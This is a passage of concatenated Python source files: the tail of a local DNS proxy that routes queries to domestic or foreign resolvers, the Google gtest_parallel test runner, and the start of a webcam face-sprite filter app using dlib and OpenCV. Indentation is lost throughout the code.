while len > 0:
if len >= 64:
len = len & 0x3f
offset = (len << 8) + ord(message.read(1))
mesg = StringIO(message.getvalue())
mesg.seek(offset)
labels.extend(_parse_domain_labels(mesg))
return labels
else:
labels.append(message.read(len))
len = ord(message.read(1))
return labels
def parse_domain_name(message):
return '.'.join(_parse_domain_labels(message))
def addr_p2n(addr):
return socket.inet_aton(addr)
def buildrspdata(reqdata,end_offset,packed_ip):
rspdata = reqdata[:2] + '\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00'
rspdata += reqdata[12:end_offset]
rspdata += '\xc0\x0c'
rspdata += '\x00\x01'
rspdata += '\x00\x01\x00\x00\x07\xd0'
rspdata += '\x00' + chr(len(packed_ip))
rspdata += packed_ip
return rspdata
class DNSProxyHandler_ByTCP(StreamRequestHandler):
def handle(self):
data = self.connection.recv(1024)
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("8.8.8.8",53))
s.send(data)
r_data = s.recv(1024)
self.wfile.write(r_data)
s.close()
class DNSProxyHandler(BaseRequestHandler):
def handle(self):
reqdata, sock = self.request
req = parse_dns_message(reqdata)
q = req.question
if self.server.Log_all :
tmp = ''+q.name.ljust(30) + ' ' +time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))+ ' Type:' + str(q.type_)+'\n'
ptmp = DNS_LOCAL_PATH+'All_query.log'
ALL_LOG_LOCK.acquire()
log = open(ptmp ,'a')
log.write(tmp)
log.close()
ALL_LOG_LOCK.release()
if (q.type_ == DNS_TYPE_A) and (q.class_ == DNS_CLASS_IN):
for ip,name in self.server.hostslist:
if fnmatch(q.name.upper(), name.upper()):
if ip == 'skip':
break
rspdata = buildrspdata(reqdata,q.end_offset,ip)
sock.sendto(rspdata, self.client_address)
return
for name,CorF in self.server.switchlist:
if fnmatch(q.name.upper(), name.upper()):
rspdata = self._get_response(reqdata , CorF)
if rspdata:
sock.sendto(rspdata, self.client_address)
return
_tmp = q.name+'\n'
_ptmp = DNS_LOCAL_PATH+'switch.log'
SWI_LOG_LOCK.acquire()
log = open(_ptmp,'a')
log.write(_tmp)
log.close()
SWI_LOG_LOCK.release()
rspdata = self._get_response(reqdata , True)
if rspdata:
sock.sendto(rspdata, self.client_address)
return
else:
rspdata = self._get_response(reqdata , True)
if rspdata:
sock.sendto(rspdata, self.client_address)
return
def _get_response(self, data ,CorF):
con = 0
rspdata = None
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect((self.server.servers[(not CorF) and 1 or 0], 53))
while not rspdata and con <4:
try:
con += 1
sock.sendall(data)
sock.settimeout(3)
rspdata = sock.recv(65535)
except:
rspdata = None
sock.close()
return rspdata
def loadconf():
DNS_SERVER = [None,None]
log_all = [False]
def readline(line):
if (not line.startswith('#')) and len(line) > 2:
parts = line.strip().split()[:2]
if parts[0] == 'Note_Down_All':
if parts[1] == '1':
log_all[0] = True
return
if re.search(reg_IP, parts[1]):
if parts[0] == 'Foreign_DNS':
DNS_SERVER[0]=parts[1]
return
if parts[0] == 'Celestial_DNS':
DNS_SERVER[1]=parts[1]
return
print 'Warning:',DNS_CONFIG_FILE,' has some error at ',line
with open(DNS_LOCAL_PATH+DNS_CONFIG_FILE) as conf:
for line in conf:
readline(line)
if DNS_SERVER[0] and DNS_SERVER[1]:
return tuple(DNS_SERVER),log_all[0]
else:
return None,None
def lodehosts():
hostsline = []
def readline(line):
if (not line.startswith('#')) and len(line) > 2:
parts = line.strip().split()[:2]
if parts[0] == 'skip':
return 'skip',parts[1]
if re.search(reg_IP, parts[0]):
try:
return addr_p2n(parts[0]),parts[1]
except:
return None
return None
return None
with open(DNS_LOCAL_PATH+DNS_HOSTS_FILE) as hosts:
for line in hosts:
htmp = readline(line)
if htmp:
hostsline.append(htmp)
return tuple(hostsline)
def loadswitchfile():
CorF = [False]
switchlist = []
def readline(line):
if (not line.startswith('#')) and len(line) > 2:
if line.startswith('[Celestial Urls]'):
CorF[0] = False
return
if line.startswith('[Foreign Urls]'):
CorF[0] = True
return
if len(line.strip().split()) == 1:
switchlist.append(("".join(line.strip()),CorF[0]))
else:
print 'warning: something is error at ' , line , ' in file ' , DNS_SWITCH_FILE
with open(DNS_LOCAL_PATH+DNS_SWITCH_FILE) as switch:
for line in switch:
readline(line)
return tuple(switchlist)
class DNSProxyServer(ThreadingUDPServer):
def __init__(self):
log = open(DNS_LOCAL_PATH+'switch.log','w')
log.write('This file will be clear up when restar !\nUnswitched DNS query :\n')
log.close()
self.hostslist = lodehosts()
self.switchlist = loadswitchfile()
self.servers,self.Log_all = loadconf()
if not self.servers:
print 'Loding ',DNS_CONFIG_FILE,' false '
sys.exit(0)
print 'z.DNS is running now ! \nUsing DNS : ' + self.servers[0] + ' ' + self.servers[1]
ThreadingUDPServer.__init__(self, ('127.0.0.1', 53), DNSProxyHandler)
class DNSProxyServer_ByTCP(ThreadingTCPServer):
def __init__(self):
ThreadingTCPServer.__init__(self, ('127.0.0.1', 53), DNSProxyHandler_ByTCP)
if __name__ == '__main__':
main()
|
gtest_parallel.py
|
# Copyright 2013 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import errno
from functools import total_ordering
import gzip
import io
import json
import multiprocessing
import optparse
import os
import re
import shutil
import signal
import subprocess
import sys
import tempfile
import threading
import time
if sys.version_info.major >= 3:
long = int
import _pickle as cPickle
import _thread as thread
else:
import cPickle
import thread
from pickle import HIGHEST_PROTOCOL as PICKLE_HIGHEST_PROTOCOL
if sys.platform == 'win32':
import msvcrt
else:
import fcntl
# An object that catches SIGINT sent to the Python process and notices
# if processes passed to wait() die by SIGINT (we need to look for
# both of those cases, because pressing Ctrl+C can result in either
# the main process or one of the subprocesses getting the signal).
#
# Before a SIGINT is seen, wait(p) will simply call p.wait() and
# return the result. Once a SIGINT has been seen (in the main process
# or a subprocess, including the one the current call is waiting for),
# wait(p) will call p.terminate() and raise ProcessWasInterrupted.
class SigintHandler(object):
class ProcessWasInterrupted(Exception): pass
sigint_returncodes = {-signal.SIGINT, # Unix
-1073741510, # Windows
}
def __init__(self):
self.__lock = threading.Lock()
self.__processes = set()
self.__got_sigint = False
signal.signal(signal.SIGINT, lambda signal_num, frame: self.interrupt())
def __on_sigint(self):
self.__got_sigint = True
while self.__processes:
try:
self.__processes.pop().terminate()
except OSError:
pass
def interrupt(self):
with self.__lock:
self.__on_sigint()
def got_sigint(self):
with self.__lock:
return self.__got_sigint
def wait(self, p):
with self.__lock:
if self.__got_sigint:
p.terminate()
self.__processes.add(p)
code = p.wait()
with self.__lock:
self.__processes.discard(p)
if code in self.sigint_returncodes:
self.__on_sigint()
if self.__got_sigint:
raise self.ProcessWasInterrupted
return code
sigint_handler = SigintHandler()
# Return the width of the terminal, or None if it couldn't be
# determined (e.g. because we're not being run interactively).
def term_width(out):
if not out.isatty():
return None
try:
p = subprocess.Popen(["stty", "size"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(out, err) = p.communicate()
if p.returncode != 0 or err:
return None
return int(out.split()[1])
except (IndexError, OSError, ValueError):
return None
# Output transient and permanent lines of text. If several transient
# lines are written in sequence, the new will overwrite the old. We
# use this to ensure that lots of unimportant info (tests passing)
# won't drown out important info (tests failing).
class Outputter(object):
def __init__(self, out_file):
self.__out_file = out_file
self.__previous_line_was_transient = False
self.__width = term_width(out_file) # Line width, or None if not a tty.
def transient_line(self, msg):
if self.__width is None:
self.__out_file.write(msg + "\n")
else:
self.__out_file.write("\r" + msg[:self.__width].ljust(self.__width))
self.__previous_line_was_transient = True
def flush_transient_output(self):
if self.__previous_line_was_transient:
self.__out_file.write("\n")
self.__previous_line_was_transient = False
def permanent_line(self, msg):
self.flush_transient_output()
self.__out_file.write(msg + "\n")
def get_save_file_path():
"""Return path to file for saving transient data."""
if sys.platform == 'win32':
default_cache_path = os.path.join(os.path.expanduser('~'),
'AppData', 'Local')
cache_path = os.environ.get('LOCALAPPDATA', default_cache_path)
else:
# We don't use xdg module since it's not a standard.
default_cache_path = os.path.join(os.path.expanduser('~'), '.cache')
cache_path = os.environ.get('XDG_CACHE_HOME', default_cache_path)
if os.path.isdir(cache_path):
return os.path.join(cache_path, 'gtest-parallel')
else:
sys.stderr.write('Directory {} does not exist'.format(cache_path))
return os.path.join(os.path.expanduser('~'), '.gtest-parallel-times')
@total_ordering
class Task(object):
"""Stores information about a task (single execution of a test).
This class stores information about the test to be executed (gtest binary and
test name), and its result (log file, exit code and runtime).
Each task is uniquely identified by the gtest binary, the test name and an
execution number that increases each time the test is executed.
Additionaly we store the last execution time, so that next time the test is
executed, the slowest tests are run first.
"""
def __init__(self, test_binary, test_name, test_command, execution_number,
last_execution_time, output_dir):
self.test_name = test_name
self.output_dir = output_dir
self.test_binary = test_binary
self.test_command = test_command
self.execution_number = execution_number
self.last_execution_time = last_execution_time
self.exit_code = None
self.runtime_ms = None
self.test_id = (test_binary, test_name)
self.task_id = (test_binary, test_name, self.execution_number)
self.log_file = Task._logname(self.output_dir, self.test_binary,
test_name, self.execution_number)
def __sorting_key(self):
# Unseen or failing tests (both missing execution time) take precedence over
# execution time. Tests are greater (seen as slower) when missing times so
# that they are executed first.
return (1 if self.last_execution_time is None else 0,
self.last_execution_time)
def __eq__(self, other):
return self.__sorting_key() == other.__sorting_key()
def __ne__(self, other):
return not (self == other)
def __lt__(self, other):
return self.__sorting_key() < other.__sorting_key()
@staticmethod
def _normalize(string):
return re.sub('[^A-Za-z0-9]', '_', string)
@staticmethod
def _logname(output_dir, test_binary, test_name, execution_number):
# Store logs to temporary files if there is no output_dir.
if output_dir is None:
(log_handle, log_name) = tempfile.mkstemp(prefix='gtest_parallel_',
suffix=".log")
os.close(log_handle)
return log_name
log_name = '%s-%s-%d.log' % (Task._normalize(os.path.basename(test_binary)),
Task._normalize(test_name), execution_number)
return os.path.join(output_dir, log_name)
def run(self):
begin = time.time()
with open(self.log_file, 'w') as log:
task = subprocess.Popen(self.test_command, stdout=log, stderr=log)
try:
self.exit_code = sigint_handler.wait(task)
except sigint_handler.ProcessWasInterrupted:
thread.exit()
self.runtime_ms = int(1000 * (time.time() - begin))
self.last_execution_time = None if self.exit_code else self.runtime_ms
class TaskManager(object):
"""Executes the tasks and stores the passed, failed and interrupted tasks.
When a task is run, this class keeps track if it passed, failed or was
interrupted. After a task finishes it calls the relevant functions of the
Logger, TestResults and TestTimes classes, and in case of failure, retries the
test as specified by the --retry_failed flag.
"""
def __init__(self, times, logger, test_results, task_factory, times_to_retry,
initial_execution_number):
self.times = times
self.logger = logger
self.test_results = test_results
self.task_factory = task_factory
self.times_to_retry = times_to_retry
self.initial_execution_number = initial_execution_number
self.global_exit_code = 0
self.passed = []
self.failed = []
self.started = {}
self.execution_number = {}
self.lock = threading.Lock()
def __get_next_execution_number(self, test_id):
with self.lock:
next_execution_number = self.execution_number.setdefault(
test_id, self.initial_execution_number)
self.execution_number[test_id] += 1
return next_execution_number
def __register_start(self, task):
with self.lock:
self.started[task.task_id] = task
def __register_exit(self, task):
self.logger.log_exit(task)
self.times.record_test_time(task.test_binary, task.test_name,
task.last_execution_time)
if self.test_results:
self.test_results.log(task.test_name, task.runtime_ms,
"PASS" if task.exit_code == 0 else "FAIL")
with self.lock:
self.started.pop(task.task_id)
if task.exit_code == 0:
self.passed.append(task)
else:
self.failed.append(task)
def run_task(self, task):
for try_number in range(self.times_to_retry + 1):
self.__register_start(task)
task.run()
self.__register_exit(task)
if task.exit_code == 0:
break
if try_number < self.times_to_retry:
execution_number = self.__get_next_execution_number(task.test_id)
# We need create a new Task instance. Each task represents a single test
# execution, with its own runtime, exit code and log file.
task = self.task_factory(task.test_binary, task.test_name,
task.test_command, execution_number,
task.last_execution_time, task.output_dir)
with self.lock:
if task.exit_code != 0:
self.global_exit_code = task.exit_code
class FilterFormat(object):
def __init__(self, output_dir):
if sys.stdout.isatty():
# stdout needs to be unbuffered since the output is interactive.
if isinstance(sys.stdout, io.TextIOWrapper):
# workaround for https://bugs.python.org/issue17404
sys.stdout = io.TextIOWrapper(sys.stdout.detach(),
line_buffering=True,
write_through=True,
newline='\n')
else:
sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)
self.output_dir = output_dir
self.total_tasks = 0
self.finished_tasks = 0
self.out = Outputter(sys.stdout)
self.stdout_lock = threading.Lock()
def move_to(self, destination_dir, tasks):
if self.output_dir is None:
return
destination_dir = os.path.join(self.output_dir, destination_dir)
os.makedirs(destination_dir)
for task in tasks:
shutil.move(task.log_file, destination_dir)
def print_tests(self, message, tasks, print_try_number):
self.out.permanent_line("%s (%s/%s):" %
(message, len(tasks), self.total_tasks))
for task in sorted(tasks):
runtime_ms = 'Interrupted'
if task.runtime_ms is not None:
runtime_ms = '%d ms' % task.runtime_ms
self.out.permanent_line("%11s: %s %s%s" % (
runtime_ms, task.test_binary, task.test_name,
(" (try #%d)" % task.execution_number) if print_try_number else ""))
def log_exit(self, task):
with self.stdout_lock:
self.finished_tasks += 1
self.out.transient_line("[%d/%d] %s (%d ms)"
% (self.finished_tasks, self.total_tasks,
task.test_name, task.runtime_ms))
if task.exit_code != 0:
with open(task.log_file) as f:
for line in f.readlines():
self.out.permanent_line(line.rstrip())
self.out.permanent_line(
"[%d/%d] %s returned/aborted with exit code %d (%d ms)"
% (self.finished_tasks, self.total_tasks, task.test_name,
task.exit_code, task.runtime_ms))
if self.output_dir is None:
# Try to remove the file 100 times (sleeping for 0.1 second in between).
# This is a workaround for a process handle seemingly holding on to the
# file for too long inside os.subprocess. This workaround is in place
# until we figure out a minimal repro to report upstream (or a better
# suspect) to prevent os.remove exceptions.
num_tries = 100
for i in range(num_tries):
try:
os.remove(task.log_file)
except OSError as e:
if e.errno is not errno.ENOENT:
if i is num_tries - 1:
self.out.permanent_line('Could not remove temporary log file: ' + str(e))
else:
time.sleep(0.1)
continue
break
def log_tasks(self, total_tasks):
self.total_tasks += total_tasks
self.out.transient_line("[0/%d] Running tests..." % self.total_tasks)
def summarize(self, passed_tasks, failed_tasks, interrupted_tasks):
stats = {}
def add_stats(stats, task, idx):
task_key = (task.test_binary, task.test_name)
if not task_key in stats:
# (passed, failed, interrupted) task_key is added as tie breaker to get
# alphabetic sorting on equally-stable tests
stats[task_key] = [0, 0, 0, task_key]
stats[task_key][idx] += 1
for task in passed_tasks:
add_stats(stats, task, 0)
for task in failed_tasks:
add_stats(stats, task, 1)
for task in interrupted_tasks:
add_stats(stats, task, 2)
self.out.permanent_line("SUMMARY:")
for task_key in sorted(stats, key=stats.__getitem__):
(num_passed, num_failed, num_interrupted, _) = stats[task_key]
(test_binary, task_name) = task_key
self.out.permanent_line(
" %s %s passed %d / %d times%s." %
(test_binary, task_name, num_passed,
num_passed + num_failed + num_interrupted,
"" if num_interrupted == 0 else (" (%d interrupted)" % num_interrupted)))
def flush(self):
self.out.flush_transient_output()
class CollectTestResults(object):
def __init__(self, json_dump_filepath):
self.test_results_lock = threading.Lock()
self.json_dump_file = open(json_dump_filepath, 'w')
self.test_results = {
"interrupted": False,
"path_delimiter": ".",
# Third version of the file format. See the link in the flag description
# for details.
"version": 3,
"seconds_since_epoch": int(time.time()),
"num_failures_by_type": {
"PASS": 0,
"FAIL": 0,
},
"tests": {},
}
def log(self, test, runtime_ms, actual_result):
with self.test_results_lock:
self.test_results['num_failures_by_type'][actual_result] += 1
results = self.test_results['tests']
for name in test.split('.'):
results = results.setdefault(name, {})
if results:
results['actual'] += ' ' + actual_result
results['times'].append(runtime_ms)
else: # This is the first invocation of the test
results['actual'] = actual_result
results['times'] = [runtime_ms]
results['time'] = runtime_ms
results['expected'] = 'PASS'
def dump_to_file_and_close(self):
json.dump(self.test_results, self.json_dump_file)
self.json_dump_file.close()
# Record of test runtimes. Has built-in locking.
class TestTimes(object):
class LockedFile(object):
def __init__(self, filename, mode):
self._filename = filename
self._mode = mode
self._fo = None
def __enter__(self):
self._fo = open(self._filename, self._mode)
# Regardless of opening mode we always seek to the beginning of file.
# This simplifies code working with LockedFile and also ensures that
# we lock (and unlock below) always the same region in file on win32.
self._fo.seek(0)
try:
if sys.platform == 'win32':
# We are locking here fixed location in file to use it as
# an exclusive lock on entire file.
msvcrt.locking(self._fo.fileno(), msvcrt.LK_LOCK, 1)
else:
fcntl.flock(self._fo.fileno(), fcntl.LOCK_EX)
except IOError:
self._fo.close()
raise
return self._fo
def __exit__(self, exc_type, exc_value, traceback):
# Flush any buffered data to disk. This is needed to prevent race
# condition which happens from the moment of releasing file lock
# till closing the file.
self._fo.flush()
try:
if sys.platform == 'win32':
self._fo.seek(0)
msvcrt.locking(self._fo.fileno(), msvcrt.LK_UNLCK, 1)
else:
fcntl.flock(self._fo.fileno(), fcntl.LOCK_UN)
finally:
self._fo.close()
return exc_value is None
def __init__(self, save_file):
"Create new object seeded with saved test times from the given file."
self.__times = {} # (test binary, test name) -> runtime in ms
# Protects calls to record_test_time(); other calls are not
# expected to be made concurrently.
self.__lock = threading.Lock()
try:
with TestTimes.LockedFile(save_file, 'rb') as fd:
times = TestTimes.__read_test_times_file(fd)
except IOError:
# We couldn't obtain the lock.
return
# Discard saved times if the format isn't right.
if type(times) is not dict:
return
for ((test_binary, test_name), runtime) in times.items():
if (type(test_binary) is not str or type(test_name) is not str
or type(runtime) not in {int, long, type(None)}):
return
self.__times = times
def get_test_time(self, binary, testname):
"""Return the last duration for the given test as an integer number of
milliseconds, or None if the test failed or if there's no record for it."""
return self.__times.get((binary, testname), None)
def record_test_time(self, binary, testname, runtime_ms):
"""Record that the given test ran in the specified number of
milliseconds. If the test failed, runtime_ms should be None."""
with self.__lock:
self.__times[(binary, testname)] = runtime_ms
def write_to_file(self, save_file):
"Write all the times to file."
try:
with TestTimes.LockedFile(save_file, 'a+b') as fd:
times = TestTimes.__read_test_times_file(fd)
if times is None:
times = self.__times
else:
times.update(self.__times)
# We erase data from file while still holding a lock to it. This
# way reading old test times and appending new ones are atomic
# for external viewer.
fd.seek(0)
fd.truncate()
with gzip.GzipFile(fileobj=fd, mode='wb') as gzf:
cPickle.dump(times, gzf, PICKLE_HIGHEST_PROTOCOL)
except IOError:
pass # ignore errors---saving the times isn't that important
@staticmethod
def __read_test_times_file(fd):
try:
with gzip.GzipFile(fileobj=fd, mode='rb') as gzf:
times = cPickle.load(gzf)
except Exception:
# File doesn't exist, isn't readable, is malformed---whatever.
# Just ignore it.
return None
else:
return times
def find_tests(binaries, additional_args, options, times):
test_count = 0
tasks = []
for test_binary in binaries:
command = [test_binary]
if options.gtest_also_run_disabled_tests:
command += ['--gtest_also_run_disabled_tests']
list_command = command + ['--gtest_list_tests']
if options.gtest_filter != '':
list_command += ['--gtest_filter=' + options.gtest_filter]
try:
test_list = subprocess.check_output(list_command,
stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
sys.exit("%s: %s\n%s" % (test_binary, str(e), e.output))
try:
test_list = test_list.split('\n')
except TypeError:
# subprocess.check_output() returns bytes in python3
test_list = test_list.decode(sys.stdout.encoding).split('\n')
command += additional_args + ['--gtest_color=' + options.gtest_color]
test_group = ''
for line in test_list:
if not line.strip():
continue
if line[0] != " ":
# Remove comments for typed tests and strip whitespace.
test_group = line.split('#')[0].strip()
continue
# Remove comments for parameterized tests and strip whitespace.
line = line.split('#')[0].strip()
if not line:
continue
test_name = test_group + line
if not options.gtest_also_run_disabled_tests and 'DISABLED_' in test_name:
continue
last_execution_time = times.get_test_time(test_binary, test_name)
if options.failed and last_execution_time is not None:
continue
test_command = command + ['--gtest_filter=' + test_name]
if (test_count - options.shard_index) % options.shard_count == 0:
for execution_number in range(options.repeat):
tasks.append(Task(test_binary, test_name, test_command,
execution_number + 1, last_execution_time,
options.output_dir))
test_count += 1
# Sort the tasks to run the slowest tests first, so that faster ones can be
# finished in parallel.
return sorted(tasks, reverse=True)
def execute_tasks(tasks, pool_size, task_manager,
timeout, serialize_test_cases):
class WorkerFn(object):
def __init__(self, tasks, running_groups):
self.tasks = tasks
self.running_groups = running_groups
self.task_lock = threading.Lock()
def __call__(self):
while True:
with self.task_lock:
for task_id in range(len(self.tasks)):
task = self.tasks[task_id]
if self.running_groups is not None:
test_group = task.test_name.split('.')[0]
if test_group in self.running_groups:
# Try to find other non-running test group.
continue
else:
self.running_groups.add(test_group)
del self.tasks[task_id]
break
else:
# Either there is no tasks left or number or remaining test
# cases (groups) is less than number or running threads.
return
task_manager.run_task(task)
if self.running_groups is not None:
with self.task_lock:
self.running_groups.remove(test_group)
def start_daemon(func):
t = threading.Thread(target=func)
t.daemon = True
t.start()
return t
try:
if timeout:
timeout.start()
running_groups = set() if serialize_test_cases else None
worker_fn = WorkerFn(tasks, running_groups)
workers = [start_daemon(worker_fn) for _ in range(pool_size)]
for worker in workers:
worker.join()
finally:
if timeout:
timeout.cancel()
def default_options_parser():
parser = optparse.OptionParser(
usage = 'usage: %prog [options] binary [binary ...] -- [additional args]')
parser.add_option('-d', '--output_dir', type='string', default=None,
help='Output directory for test logs. Logs will be '
'available under gtest-parallel-logs/, so '
'--output_dir=/tmp will results in all logs being '
'available under /tmp/gtest-parallel-logs/.')
parser.add_option('-r', '--repeat', type='int', default=1,
help='Number of times to execute all the tests.')
parser.add_option('--retry_failed', type='int', default=0,
help='Number of times to repeat failed tests.')
parser.add_option('--failed', action='store_true', default=False,
help='run only failed and new tests')
parser.add_option('-w', '--workers', type='int',
default=multiprocessing.cpu_count(),
help='number of workers to spawn')
parser.add_option('--gtest_color', type='string', default='yes',
help='color output')
parser.add_option('--gtest_filter', type='string', default='',
help='test filter')
parser.add_option('--gtest_also_run_disabled_tests', action='store_true',
default=False, help='run disabled tests too')
parser.add_option('--print_test_times', action='store_true', default=False,
help='list the run time of each test at the end of execution')
parser.add_option('--shard_count', type='int', default=1,
help='total number of shards (for sharding test execution '
'between multiple machines)')
parser.add_option('--shard_index', type='int', default=0,
help='zero-indexed number identifying this shard (for '
'sharding test execution between multiple machines)')
parser.add_option('--dump_json_test_results', type='string', default=None,
help='Saves the results of the tests as a JSON machine-'
'readable file. The format of the file is specified at '
'https://www.chromium.org/developers/the-json-test-results-format')
parser.add_option('--timeout', type='int', default=None,
help='Interrupt all remaining processes after the given '
'time (in seconds).')
parser.add_option('--serialize_test_cases', action='store_true',
default=False, help='Do not run tests from the same test '
'case in parallel.')
return parser
def main():
# Remove additional arguments (anything after --).
additional_args = []
for i in range(len(sys.argv)):
if sys.argv[i] == '--':
additional_args = sys.argv[i+1:]
sys.argv = sys.argv[:i]
break
parser = default_options_parser()
(options, binaries) = parser.parse_args()
if (options.output_dir is not None and
not os.path.isdir(options.output_dir)):
parser.error('--output_dir value must be an existing directory, '
'current value is "%s"' % options.output_dir)
# Append gtest-parallel-logs to log output, this is to avoid deleting user
# data if an user passes a directory where files are already present. If a
# user specifies --output_dir=Docs/, we'll create Docs/gtest-parallel-logs
# and clean that directory out on startup, instead of nuking Docs/.
if options.output_dir:
options.output_dir = os.path.join(options.output_dir,
'gtest-parallel-logs')
if binaries == []:
parser.print_usage()
sys.exit(1)
if options.shard_count < 1:
parser.error("Invalid number of shards: %d. Must be at least 1." %
options.shard_count)
if not (0 <= options.shard_index < options.shard_count):
parser.error("Invalid shard index: %d. Must be between 0 and %d "
"(less than the number of shards)." %
(options.shard_index, options.shard_count - 1))
# Check that all test binaries have an unique basename. That way we can ensure
# the logs are saved to unique files even when two different binaries have
# common tests.
unique_binaries = set(os.path.basename(binary) for binary in binaries)
assert len(unique_binaries) == len(binaries), (
"All test binaries must have an unique basename.")
if options.output_dir:
# Remove files from old test runs.
if os.path.isdir(options.output_dir):
shutil.rmtree(options.output_dir)
# Create directory for test log output.
try:
os.makedirs(options.output_dir)
except OSError as e:
# Ignore errors if this directory already exists.
if e.errno != errno.EEXIST or not os.path.isdir(options.output_dir):
raise e
timeout = None
if options.timeout is not None:
timeout = threading.Timer(options.timeout, sigint_handler.interrupt)
test_results = None
if options.dump_json_test_results is not None:
test_results = CollectTestResults(options.dump_json_test_results)
save_file = get_save_file_path()
times = TestTimes(save_file)
logger = FilterFormat(options.output_dir)
task_manager = TaskManager(times, logger, test_results, Task,
options.retry_failed, options.repeat + 1)
tasks = find_tests(binaries, additional_args, options, times)
logger.log_tasks(len(tasks))
execute_tasks(tasks, options.workers, task_manager,
timeout, options.serialize_test_cases)
print_try_number = options.retry_failed > 0 or options.repeat > 1
if task_manager.passed:
logger.move_to('passed', task_manager.passed)
if options.print_test_times:
logger.print_tests('PASSED TESTS', task_manager.passed, print_try_number)
if task_manager.failed:
logger.print_tests('FAILED TESTS', task_manager.failed, print_try_number)
logger.move_to('failed', task_manager.failed)
if task_manager.started:
logger.print_tests(
'INTERRUPTED TESTS', task_manager.started.values(), print_try_number)
logger.move_to('interrupted', task_manager.started.values())
if options.repeat > 1 and (task_manager.failed or task_manager.started):
logger.summarize(task_manager.passed, task_manager.failed,
task_manager.started.values())
logger.flush()
times.write_to_file(save_file)
if test_results:
test_results.dump_to_file_and_close()
if sigint_handler.got_sigint():
return -signal.SIGINT
return task_manager.global_exit_code
if __name__ == "__main__":
sys.exit(main())
|
main_movember.py
|
from tkinter import *
from PIL import Image
from PIL import ImageTk
import cv2, threading, os, time
from threading import Thread
from os import listdir
from os.path import isfile, join
import random
import dlib
from imutils import face_utils, rotate_bound
import math
def draw_sprite(frame, sprite, x_offset, y_offset):
(h,w) = (sprite.shape[0], sprite.shape[1])
(imgH,imgW) = (frame.shape[0], frame.shape[1])
if y_offset+h >= imgH: #if sprite gets out of image in the bottom
sprite = sprite[0:imgH-y_offset,:,:]
if x_offset+w >= imgW: #if sprite gets out of image to the right
sprite = sprite[:,0:imgW-x_offset,:]
if x_offset < 0: #if sprite gets out of image to the left
sprite = sprite[:,abs(x_offset)::,:]
w = sprite.shape[1]
x_offset = 0
for c in range(3):
frame[y_offset:y_offset+h, x_offset:x_offset+w, c] = \
sprite[:,:,c] * (sprite[:,:,3]/255.0) + frame[y_offset:y_offset+h, x_offset:x_offset+w, c] * (1.0 - sprite[:,:,3]/255.0)
return frame
def adjust_sprite2head(sprite, head_width, head_ypos, ontop = True):
(h_sprite,w_sprite) = (sprite.shape[0], sprite.shape[1])
factor = 1.0*head_width/w_sprite
sprite = cv2.resize(sprite, (0,0), fx=factor, fy=factor) # adjust to have the same width as head
(h_sprite,w_sprite) = (sprite.shape[0], sprite.shape[1])
y_orig = head_ypos-h_sprite if ontop else head_ypos
if (y_orig < 0): #check if the head is not to close to the top of the image and the sprite would not fit in the screen
sprite = sprite[abs(y_orig)::,:,:] #in that case, we cut the sprite
y_orig = 0 #the sprite then begins at the top of the image
return (sprite, y_orig)
def apply_sprite(image, path2sprite,w,x,y, angle, ontop = True):
sprite = cv2.imread(path2sprite,-1)
#print sprite.shape
sprite = rotate_bound(sprite, angle)
(sprite, y_final) = adjust_sprite2head(sprite, w, y, ontop)
image = draw_sprite(image,sprite,x, y_final)
def calculate_inclination(point1, point2):
x1,x2,y1,y2 = point1[0], point2[0], point1[1], point2[1]
incl = 180/math.pi*math.atan((float(y2-y1))/(x2-x1))
return incl
def calculate_boundbox(list_coordinates):
x = min(list_coordinates[:,0])
y = min(list_coordinates[:,1])
w = max(list_coordinates[:,0]) - x
h = max(list_coordinates[:,1]) - y
return (x,y,w,h)
def get_face_boundbox(points, face_part):
if face_part == 1:
(x,y,w,h) = calculate_boundbox(points[17:22]) #left eyebrow
elif face_part == 2:
(x,y,w,h) = calculate_boundbox(points[22:27]) #right eyebrow
elif face_part == 3:
(x,y,w,h) = calculate_boundbox(points[36:42]) #left eye
elif face_part == 4:
(x,y,w,h) = calculate_boundbox(points[42:48]) #right eye
elif face_part == 5:
(x,y,w,h) = calculate_boundbox(points[29:36]) #nose
elif face_part == 6:
(x,y,w,h) = calculate_boundbox(points[48:68]) #mouth
return (x,y,w,h)
def cvloop(run_event):
global panelA
global SPRITES
dir_ = "./sprites/flyes/"
flies = [f for f in listdir(dir_) if isfile(join(dir_, f))] #image of flies to make the "animation"
i = 0
video_capture = cv2.VideoCapture(0) #read from webcam
fps = video_capture.get(cv2.CAP_PROP_FPS)
print(fps)
(x,y,w,h) = (0,0,10,10) #whatever initial values
#Filters path
detector = dlib.get_frontal_face_detector()
#Facial landmarks
print("[INFO] loading facial landmark predictor...")
model = "filters/shape_predictor_68_face_landmarks.dat"
predictor = dlib.shape_predictor(model) # link to model: http://dlib.net/files/shape_predictor_68_face_landmarks.dat.bz2
set_var = 1
temp = 0
while run_event.is_set(): #while the thread is active we loop
ret, image = video_capture.read()
#height, width, layers = image.shape #EDIT HERE FOR RESIZE
#print(height,width,layers)
new_h = 1080
new_w = 1440
image = cv2.resize(image, (new_w, new_h))
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
faces = detector(gray, 0)
#print(len(faces))
if len(faces) != temp:
temp = len(faces)
set_var = 1
apply_sprite(image, "./sprites/topbanner.png",1080,0,200,0)
apply_sprite(image, "./sprites/bottomborder1.png",1080,0,800,0)
apply_sprite(image, "./sprites/text.png",80,600,640,0)
for face in faces: #if there are faces
(x,y,w,h) = (face.left(), face.top(), face.width(), face.height())
# *** Facial Landmarks detection
shape = predictor(gray, face)
shape = face_utils.shape_to_np(shape)
incl = calculate_inclination(shape[17], shape[26]) #inclination based on eyebrows
# condition to see if mouth is open
is_mouth_open = (shape[66][1] -shape[62][1]) >= 10 #y coordiantes of landmark points of lips
if SPRITES[1]:
